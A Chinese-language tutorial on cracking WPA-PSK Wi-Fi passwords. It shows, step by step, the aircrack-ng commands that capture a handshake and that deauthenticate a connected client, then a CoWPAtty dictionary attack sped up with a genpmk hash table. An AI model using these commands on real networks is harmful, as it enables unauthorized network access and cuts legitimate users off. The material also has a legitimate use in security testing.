WPA破解-创建Hash-table加速并用Cowpatty破解

1.Cowpatty 软件介绍

CoWPAtty是WPA-PSK的自动字典攻击工具,它运行在Linux上,该程序具有命令行界面,并使用字典进行密码攻击。

2.渗透流程

1.安装CoWPAtty

cowpatty

WPA破解-创建Hash-table加速并用Cowpatty破解_网络

如果出现如下报错:

WPA破解-创建Hash-table加速并用Cowpatty破解_安全_02

请输入

apt install binutils

即可

2.抓握手包

1.查看网卡

ip a

WPA破解-创建Hash-table加速并用Cowpatty破解_客户端_03

2.开启监听模式

airmon-ng start wlan0

WPA破解-创建Hash-table加速并用Cowpatty破解_安全_04

3.扫描wifi

airodump-ng wlan0mon

WPA破解-创建Hash-table加速并用Cowpatty破解_网络安全_05

4.抓握手包

airodump-ng wlan0mon -c 1 --bssid 10:BD:18:08:43:31 -w wpa-1 
-c:指定信道
--bssid:AP的MAC地址
-w:保存抓包结果

WPA破解-创建Hash-table加速并用Cowpatty破解_客户端_06

5.进行冲突模式攻击

aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
-a:设置 ap 的 mac
-c:设置已连接的合法客户端的 mac

WPA破解-创建Hash-table加速并用Cowpatty破解_客户端_07

3.STA重新连接wifi

成功抓到握手包

WPA破解-创建Hash-table加速并用Cowpatty破解_客户端_08

4.渗透WPA wifi

cowpatty -f passwd.txt -r  wpa-1-01.cap -s cisco-432F
-f:字典文件
-r:数据包捕获文件
-s:网络SSID(如果SSID包含空格,则使用引号括起来)

WPA破解-创建Hash-table加速并用Cowpatty破解_安全_09

密码出来了

5.使用大字典破解

cowpatty -f pwd.txt -r  wpa-1-01.cap -s cisco-432F

WPA破解-创建Hash-table加速并用Cowpatty破解_客户端_10

可以看到没有加速的情况下,用大字典去跑非常的慢

3.hash-table加速

1.将密码字典生成hash-table

genpmk -f  pwd.txt -d ./pwdhash -s cisco-432F
-s wifi的SSID

WPA破解-创建Hash-table加速并用Cowpatty破解_安全_11

生成hask-table速度比较慢,一般要几小时,但是具有可传播性

2.加速渗透

cowpatty -d pwdhash -r  wpa-1-01.cap -s cisco-432F

WPA破解-创建Hash-table加速并用Cowpatty破解_网络_12

这里实际上破解密码的速度是加速前的好几十倍

WPA破解-创建Hash-table加速并用Cowpatty破解_安全_13

加速效果对比:

WPA破解-创建Hash-table加速并用Cowpatty破解_监听模式_14


400的速度和300000的速度

WPA破解-创建Hash-table加速并用Cowpatty破解_网络安全_15